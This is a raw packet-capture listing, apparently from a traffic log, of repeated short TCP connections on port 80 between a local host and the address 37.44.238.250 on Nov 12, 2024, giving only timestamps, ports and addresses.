                                                                                                            Nov 12, 2024 00:43:34.232040882 CET805005537.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:34.572910070 CET5005580192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:34.577964067 CET805005537.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:34.577977896 CET805005537.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:34.577996969 CET805005537.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:35.117856026 CET805005537.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:35.118542910 CET805005537.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:35.118628979 CET5005580192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:35.118766069 CET805005537.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:35.118812084 CET5005580192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:35.258755922 CET5005580192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:35.265116930 CET805005537.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:35.269593000 CET5005580192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:35.313991070 CET5006180192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:35.320391893 CET805006137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:35.321647882 CET5006180192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:35.333151102 CET5006180192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:35.341133118 CET805006137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:35.682331085 CET5006180192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:35.809233904 CET805006137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:35.809277058 CET805006137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:35.809480906 CET805006137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:35.888870001 CET805006137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:36.053045034 CET805006137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:36.053113937 CET5006180192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:36.180875063 CET5006180192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:36.181519985 CET5006780192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:36.187304974 CET805006137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:36.187359095 CET5006180192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:36.188079119 CET805006737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:36.188137054 CET5006780192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:36.188241005 CET5006780192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:36.194717884 CET805006737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:36.526945114 CET5006780192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:36.528151035 CET5007380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:36.534285069 CET805007337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:36.534339905 CET5007380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:36.534482002 CET5007380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:36.540903091 CET805007337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:36.576914072 CET805006737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:36.596601963 CET805006737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:36.596683979 CET5006780192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:36.648749113 CET5007480192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:36.655144930 CET805007437.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:36.655256033 CET5007480192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:36.655339956 CET5007480192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:36.661825895 CET805007437.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:36.885618925 CET5007380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:36.891848087 CET805007337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:36.893485069 CET805007337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:37.010441065 CET5007480192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:37.015306950 CET805007437.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:37.015324116 CET805007437.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:37.015332937 CET805007437.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:37.101097107 CET805007337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:37.177484989 CET805007337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:37.179905891 CET5007380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:37.222801924 CET805007437.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:37.297070026 CET805007437.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:37.299689054 CET5007480192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:37.418515921 CET5007380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:37.418591976 CET5007480192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:37.419215918 CET5008080192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:37.425389051 CET805007337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:37.425440073 CET5007380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:37.425450087 CET805007437.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:37.425542116 CET5007480192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:37.425570011 CET805008037.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:37.425632954 CET5008080192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:37.425729036 CET5008080192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:37.432183981 CET805008037.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:37.776102066 CET5008080192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:37.782607079 CET805008037.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:37.782628059 CET805008037.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:37.782638073 CET805008037.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:37.992738962 CET805008037.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:38.041635036 CET5008080192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:38.073385954 CET805008037.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:38.151436090 CET5008080192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:38.438357115 CET5008080192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:38.439130068 CET5008680192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:38.445144892 CET805008037.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:38.445194006 CET5008080192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:38.445228100 CET805008637.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:38.445282936 CET5008680192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:38.445396900 CET5008680192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:38.451915979 CET805008637.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:38.791718006 CET5008680192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:38.798161983 CET805008637.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:38.798228979 CET805008637.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:38.798238039 CET805008637.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:39.012022972 CET805008637.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:39.057384968 CET5008680192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:39.100905895 CET805008637.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:39.226933002 CET5008680192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:39.232434034 CET805008637.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:39.235670090 CET5008680192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:39.262023926 CET5009280192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:39.267251968 CET805009237.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:39.268219948 CET5009280192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:39.268294096 CET5009280192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:39.273250103 CET805009237.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:39.619951963 CET5009280192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:39.974097013 CET805009237.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:39.975024939 CET805009237.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:39.975296021 CET805009237.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:39.975353003 CET805009237.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:40.064920902 CET805009237.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:40.065030098 CET5009280192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:40.221590042 CET805009237.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:40.307259083 CET5009280192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:40.345930099 CET5009280192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:40.350070000 CET5010380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:40.353488922 CET805009237.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:40.353559971 CET5009280192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:40.356129885 CET805010337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:40.356237888 CET5010380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:40.356328964 CET5010380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:40.361079931 CET805010337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:40.759666920 CET5010380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:40.767579079 CET805010337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:40.767596006 CET805010337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:40.767604113 CET805010337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:40.942455053 CET805010337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:41.022089005 CET805010337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:41.022177935 CET5010380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:41.156934977 CET5010380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:41.159943104 CET5010880192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:41.167872906 CET805010337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:41.167979956 CET5010380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:41.170032024 CET805010837.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:41.170104027 CET5010880192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:41.170218945 CET5010880192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:41.180646896 CET805010837.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:41.526750088 CET5010880192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:41.533139944 CET805010837.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:41.533153057 CET805010837.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:41.533176899 CET805010837.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:41.741249084 CET805010837.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:41.822916031 CET805010837.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:41.823714018 CET5010880192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:41.949668884 CET5010880192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:41.950342894 CET5011380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:41.956262112 CET805010837.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:41.956321955 CET5010880192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:41.956440926 CET805011337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:41.956505060 CET5011380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:41.956615925 CET5011380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:41.963079929 CET805011337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:42.183572054 CET5011380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:42.184221029 CET5011480192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:42.189088106 CET805011437.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:42.191723108 CET5011480192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:42.191817999 CET5011480192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:42.196603060 CET805011437.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:42.232907057 CET805011337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:42.309961081 CET5011580192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:42.314838886 CET805011537.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:42.314914942 CET5011580192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:42.315013885 CET5011580192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:42.319812059 CET805011537.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:42.387422085 CET805011337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:42.387504101 CET5011380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:42.542426109 CET5011480192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:42.547354937 CET805011437.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:42.547420979 CET805011437.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:42.667450905 CET5011580192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:42.672352076 CET805011537.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:42.672363043 CET805011537.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:42.672372103 CET805011537.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:42.759407997 CET805011437.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:42.807264090 CET5011480192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:42.836110115 CET805011437.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:42.885152102 CET805011537.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:42.960433960 CET805011537.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:42.960501909 CET5011580192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:42.994782925 CET5011480192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:43.089019060 CET5011480192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:43.089159966 CET5011580192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:43.089888096 CET5011680192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:43.096359015 CET805011637.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:43.096425056 CET5011680192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:43.096551895 CET5011680192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:43.100269079 CET805011437.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:43.100341082 CET5011480192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:43.100426912 CET805011537.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:43.100477934 CET5011580192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:43.101674080 CET805011637.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:43.454417944 CET5011680192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:43.459404945 CET805011637.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:43.459467888 CET805011637.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:43.459815979 CET805011637.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:43.663463116 CET805011637.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:43.743866920 CET805011637.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:43.743921995 CET5011680192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:43.868895054 CET5011780192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:43.875368118 CET805011737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:43.875454903 CET5011780192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:43.875674963 CET5011780192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:43.882128954 CET805011737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:44.229233980 CET5011780192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:44.235743046 CET805011737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:44.236083984 CET805011737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:44.236093998 CET805011737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:44.462975025 CET805011737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:44.541424036 CET805011737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:44.541491985 CET5011780192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:44.664052010 CET5011780192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:44.664355040 CET5011880192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:44.669214964 CET805011737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:44.669229031 CET805011837.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:44.669286966 CET5011780192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:44.669331074 CET5011880192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:44.669426918 CET5011880192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:44.674413919 CET805011837.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:45.026789904 CET5011880192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:45.151088953 CET5011880192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:45.557291031 CET5011880192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:45.768650055 CET805011837.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:45.768773079 CET805011837.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:45.768832922 CET5011880192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:45.768892050 CET805011837.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:45.768935919 CET5011880192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:45.771348000 CET805011837.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:45.771406889 CET5011880192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:45.772202969 CET805011837.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:45.772356033 CET805011837.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:45.772366047 CET805011837.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:45.772640944 CET805011837.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:45.773720980 CET805011837.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:45.776231050 CET805011837.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:45.776285887 CET805011837.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:46.012969971 CET805011837.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:46.151060104 CET5011880192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:46.440675020 CET5011880192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:46.441643000 CET5011980192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:46.445873022 CET805011837.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:46.445931911 CET5011880192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:46.446468115 CET805011937.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:46.446527004 CET5011980192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:46.446635008 CET5011980192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:46.451795101 CET805011937.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:46.792510986 CET5011980192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:46.797523022 CET805011937.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:46.797537088 CET805011937.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:46.797553062 CET805011937.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:47.012706995 CET805011937.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:47.102960110 CET805011937.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:47.103030920 CET5011980192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:47.225378036 CET5011980192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:47.225919008 CET5012080192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:47.230815887 CET805012037.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:47.230894089 CET5012080192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:47.231043100 CET805011937.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:47.231086969 CET5011980192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:47.231093884 CET5012080192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:47.235862970 CET805012037.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:47.589257956 CET5012080192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:47.594208002 CET805012037.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:47.594221115 CET805012037.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:47.594230890 CET805012037.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:47.816188097 CET805012037.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:47.840066910 CET5012180192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:47.845134020 CET805012137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:47.845226049 CET5012180192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:47.845331907 CET5012180192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:47.850266933 CET805012137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:47.899507046 CET805012037.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:47.899585009 CET5012080192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:47.899637938 CET5012080192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:47.904659033 CET805012037.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:47.904711962 CET5012080192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:48.198184967 CET5012180192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:48.203074932 CET805012137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:48.203150034 CET805012137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:48.239494085 CET5011680192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:48.275762081 CET5012280192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:48.280586958 CET805012237.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:48.280647993 CET5012280192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:48.280769110 CET5012280192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:48.285603046 CET805012237.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:48.416018009 CET805012137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:48.494853973 CET5012180192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:48.495001078 CET805012137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:48.604190111 CET5012180192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:48.638767958 CET5012280192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:48.643624067 CET805012237.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:48.643635988 CET805012237.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:48.643646955 CET805012237.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:48.865545988 CET805012237.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:48.946394920 CET805012237.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:48.946484089 CET5012280192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:49.120557070 CET5012180192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:49.120567083 CET5012280192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:49.121277094 CET5012380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:49.127993107 CET805012137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:49.128005981 CET805012237.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:49.128017902 CET805012337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:49.128042936 CET5012180192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:49.128089905 CET5012280192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:49.128109932 CET5012380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:49.128282070 CET5012380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:49.133874893 CET805012337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:49.479324102 CET5012380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:49.486534119 CET805012337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:49.486551046 CET805012337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:49.486620903 CET805012337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:49.712791920 CET805012337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:49.792721987 CET805012337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:49.792778969 CET5012380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:49.914869070 CET5012480192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:49.919687986 CET805012437.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:49.919759035 CET5012480192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:49.919897079 CET5012480192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:49.924973011 CET805012437.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:50.276292086 CET5012480192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:50.281259060 CET805012437.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:50.281272888 CET805012437.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:50.281584978 CET805012437.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:50.516762972 CET805012437.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:50.595385075 CET805012437.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:50.595479965 CET5012480192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:50.721693993 CET5012480192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:50.722507954 CET4994780192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:50.722546101 CET5012380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:50.723463058 CET5012580192.168.2.437.44.238.250
